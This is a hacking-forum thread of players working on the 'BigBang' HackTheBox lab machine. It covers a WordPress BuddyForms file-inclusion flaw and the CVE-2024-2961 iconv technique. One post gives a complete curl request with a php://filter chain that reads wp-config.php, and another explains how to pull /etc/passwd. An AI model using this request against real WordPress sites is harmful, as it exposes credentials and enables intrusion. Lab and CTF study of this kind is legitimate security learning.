|
BigBang a Linux - Hard Machine
by StingEm - Saturday January 25, 2025 at 03:24 PM
|
|
Jan 25, 2025, 09:44 PM
I am currently looking into :
https://medium.com/@knownsec404team/anal...1c165cd897 and trying this exploit: https://github.com/ambionics/cnext-exploits.git Fingers crossed but this looks like it may be workable
Well you know EVERYONE is having a hard time on this one - everyone has gone quite and at 4+ hours in no 1st Bloods have been taken for User or Root.
I think HTB is kicking things up a notch this season. Has anyone found anything promising - So many rabbit holes - Let's keep working it! **** jkr has taken blood (user) on BigBang! at 4 hours and 14 min
Jan 25, 2025, 11:21 PM
(This post was last modified: Jan 25, 2025, 11:21 PM by rikige6747.)
i found this http://blog.bigbang.htb/?p= where you give the p parameter the imgae id and it it redirect to http://blog.bigbang.htb/wp-content/uploa...ent_id=528 im playing around with it
Jan 25, 2025, 11:34 PM
We should use wrapwrap. I was able to retreive /etc/passwd with it ...
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Jan 25, 2025, 11:39 PM
Jan 25, 2025, 11:46 PM
(Jan 25, 2025, 11:39 PM)StingEm Wrote:(Jan 25, 2025, 11:34 PM)nothing0112358 Wrote: We should use wrapwrap. I was able to retreive /etc/passwd with it ... basically you just do on your machime python3 wrapwrap.py <any dumb file> "GIF89a" "" 441919 You will get a chain.txt. You copy the php filter in it. You do the Post to the admin-ajax.php (as in the article). You just put url=php://filter<chain.txt filter>/resource=file:///etc/passwd) and you submit. It will give you back a png that contains the /etc/passwd. I am not able to leverage this. I think there is some bugs in wrapwrap. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Jan 26, 2025, 12:04 AM
(Jan 25, 2025, 11:46 PM)nothing0112358 Wrote:(Jan 25, 2025, 11:39 PM)StingEm Wrote:(Jan 25, 2025, 11:34 PM)nothing0112358 Wrote: We should use wrapwrap. I was able to retreive /etc/passwd with it ... I'm getting {"status":"FAILED","response":"Wrong Format or Empty Url."
Jan 26, 2025, 12:09 AM
There is no bug..
curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=../wp-config.php' -v
Jan 26, 2025, 12:39 AM
LFI works, that's confirmed and correct. The wrapwrap works fine.
But this is not enough, not nearly enough... the buddyform exploit needs to be futher developed..
Jan 26, 2025, 12:42 AM
Yes i think you have to build what they show in video: https://www.ambionics.io/blog/iconv-cve-2024-2961-p1
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,167 |
1 hour ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,491 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
[FREE] HackTheBox All Cheatsheets | 3 | 396 |
Yesterday, 10:36 PM Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 92,002 |
Yesterday, 04:10 PM Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,226 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||
